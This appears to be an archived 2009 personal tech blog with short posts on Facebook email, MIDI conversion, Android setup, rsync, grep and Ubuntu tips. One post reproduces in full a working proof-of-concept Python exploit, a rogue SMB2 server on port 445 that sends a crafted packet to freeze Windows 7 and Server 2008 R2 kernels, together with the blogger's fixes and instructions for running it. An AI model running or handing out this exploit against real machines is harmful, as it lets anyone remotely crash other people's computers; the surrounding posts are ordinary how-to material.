Sunday 29 November 2009

Facebook Integrated Email Client - a "killer feature"?



The other day I realised something. I spend the vast majority of my day in the browser, with two tabs always open: Facebook, and Gmail. I use Facebook for the rich social features, photos and up-to-date contact information. Gmail I use for business communication, notifications from across the web and general communication.



What if I could combine the two? What if there was one place on the web where I could find up-to-date information about all of my friends, as well as providing private, asynchronous two-way communication by emails? I would spend all my day with this open.

What if Facebook had an email client?

Just another link on the left bar - under "News Feed", titled "Email Feed". This would show your most recent emails in a list, Facebook style, with Facebook profile pictures automatically matched to your contacts, Xoopit style. Then when you click an email, it will open and besides the email, also show information about the user, including recent updates and allow you to message them back.

If Facebook could handle my emails, I'd have no reason to keep Gmail open. I would spend all my day on Facebook. Literally. Even at work. And the integrated calendar functionality could be expanded, to provide Outlook-like viewing of availability, and event scheduling. The possibilities are endless.

Maybe I'm missing something. Maybe there's a glaringly obvious reason why Facebook doesn't do this. But as far as I can see, despite all our modern micro-blogging services, the good old email still has a lot of life left in it. If Facebook could tap into this huge business, they could potentially revolutionize email, and dramatically increase their market share at the same time. Not only that, it would also present a pathway for Facebook to move into the business communication sector, which is still largely avoiding the social network.


What about it, Facebook?

Saturday 28 November 2009

How to Convert MIDI to Mp3 using Timitidy and FFMPEG

Command line switch for outputting WAV file from timidity is -Ow.
So:
timidity -Ow ./file-to-play.midi
will generate a WAV file named ./file-to-play.wav

To convert this to mp3, use FFMPEG:
ffmpeg -i ./file-to-play.wav ./file-to-play.mp3

That's it! You will now have an mp3 file ./file-to-play.mp3

Thursday 19 November 2009

FULL CODE - Windows 7 Zero Day Exploit Proof of Concept Python Code

Here is the full code for the Windows 7 Zero Day Exploit involving SMB that was first posted here. Exploitation of this vulnerability occurs when a user attempts to browse to Windows Share hosted on the malicious server. On Windows 7, the DoS (denial of service) will occur as soon as you type ‘\\\' in the search box.

My code has fixes to ensure it will run first time. Simply copy and paste the code below into a file named "win7crash.py", and then make sure samba services are stopped ("sudo /etc/init.d/samba stop") and run "sudo python ./win7crash.py".

NOTE: Make sure the line def handle(self): is indented one space. The lines underneath this should be indented two spaces, and the last two lines not indented at all.

#!/bin/python
# This Python file uses the following encoding: utf-8
#win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an #infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash
#Author: Laurent GaffiƩ
#

import SocketServer

packet = ("\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a")


class SMB2(SocketServer.BaseRequestHandler):

def handle(self):

print "Who:", self.client_address
print "THANKS SDL"
input = self.request.recv(1024)
self.request.send(packet)
self.request.close()

launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port 445
launch.serve_forever()

Sunday 15 November 2009

How to Setup Android SDK / ADB / Fastboot Under Ubuntu 9.10

These instructions work for Ubuntu 9.10, which I am running, as well as most other linux distributions. Basically how to setup Android for debugging. I have found this works with my HTC Magic 32A.

./adb kill-server
sudo ./adb start-server
./adb devices

Setting up UDEV to recognize HTC Device -
  1. Type the following into a terminal (Applications > Accessories > Terminal):
    Code:
    gksudo gedit /etc/udev/rules.d/51-android.rules

  2. Now add the following line to the blank file:
    Code:
    SUBSYSTEM=="usb", SYSFS{idVendor}=="0bb4", MODE="0666"

  3. Click save and close.
  4. To restart udev, open up a terminal and enter:
    Code:
    sudo /etc/init.d/udev restart

Saturday 14 November 2009

How to Install Android Donut 1.6 on HTC Magic 32A (Cyanogen Mod)

I installed the lastest Cyanogen Mod firmware (v4.2.4) -  Android version 1.6 "Donut" release on my HTC Magic 32A type phone. This is the standard HTC branded phone with 292MB of RAM.

NOTE: This process will erase all DATA and APPLICATIONS on your phone. You can use Astro File Manager and My Backup to backup your phone.

Follow the instructions here:
  1. Download HTC ADP 1.6 DRC83 http://www.androidspin.com/downloads.php?dir=enomther/ROM/&file=HTC_ADP_1.6_DRC83_rooted_base.zip
  2. Download the latest CyanogenMod (see post)
  3. Download the Kernel Port file (see post)
  4. Copy all three .zip files to your SD and reboot in Recovery Mode (press Home+Power at the same time or fastboot into your recovery)
  5. Do a "Wipe data/factory reset"
  6. Do a "Wipe SD: ext partition" ** (it is recommended to wipe your Apps2SD partition for this release)
  7. Apply Zip: HTC_ADP_1.6_DRC83_rooted_base.zip
  8. Apply Zip: update-cm-xxxx-signed.zip
  9. Apply Kernel Port Zip: rad-4.xxxx.zip or bc-4.xxxx.zip (depends on who released the latest port: rad - Radix999,bc - bcrook )
  10. Reboot
  11. Either grab some popcorn and watch adb logcat as it goes past, or go do something else.. this might take a while

Thursday 12 November 2009

How to ignore hidden folders with rsync

When using rsync to copy directories, I will use the following command:

rsync -av /home/david/directory-to-copy/ /tmp/new-directory/

But to ignore hidden files (and folders) I would use the following command:

rsync -av --exclude '.*' /home/david/directory-to-copy/ /tmp/new-directory/

Tuesday 10 November 2009

Taskbar across dual monitors in Ubuntu linux

Right click panel, click "New Panel"
Right click the new panel, choose "Properties", and uncheck "Expand"
You should be able to drag it to the other monitor.
Open the panel's properties, and check "Expand" again. You may also have to choose to place it on the bottom edge of the screen.
Right click the new blank panel, and click "Add to Panel"
Choose "Window List" and click "Add". Your programs will show up in a list on the screen they are visible on.

Source: http://www.lloydleung.com/2006/10/14/gnome-multiple-monitor-taskbar-window-listing/

Using Grep -r to find strings in files - like find or locate

Searching for a String in Multiple Files

Ever need to search through all your files for a certain word or phrase? I did, and to make matters more complicated, the files were all in different sub-directories. A quick Google search turned up a few scripts involving multiple commands and temporary files. Then I found a simpler solution.

If you're a Unix/Linux/BSD user, you probably know about the grep command, but did you know it's recursive? That's right, grep can search through your entire directory tree, scanning every file along the way. It will even return the results in multiple formats!

Here's an example. In this case we're searching for the word "modules":

grep -r "modules" .

By using the "-r" switch, we're telling grep to scan files in the current directory and all sub-directories. It will return a list of files the string was found in, and a copy of the line it was found on.

If you'd rather just get the file names and skip the rest of the output, use the "-l" switch, like so:

grep -lr "modules" .

Here's another tip: grep also supports regular expressions, so matching against a wildcard pattern is easy:

grep -lr "mod.*" .

That command will print a list of files containing any word starting with "mod".

You can also use grep to search for multiple words:

grep -r "drupal\|joomla\|wordpress" .

And, of course, grep supports file name wildcards in the standard unix fashion. In this example, grep will search only file names starting with "log":

grep -lr "mod.*" ./log*

Unfortunately, not all versions of grep support recursive searching, and some use different switches, so if you're running into problems, check your man pages:

man grep

Source: http://blamcast.net/articles/recursive-grep-find-strings-files

Friday 6 November 2009

Add a directory to PATH in Ubuntu / Unix

To add a directory (in this case /app1) to your path run the following command:

export PATH=$PATH:/app1

To view the new PATH variable:

echo $PATH

System PATH environment variables are stored in /etc/profile.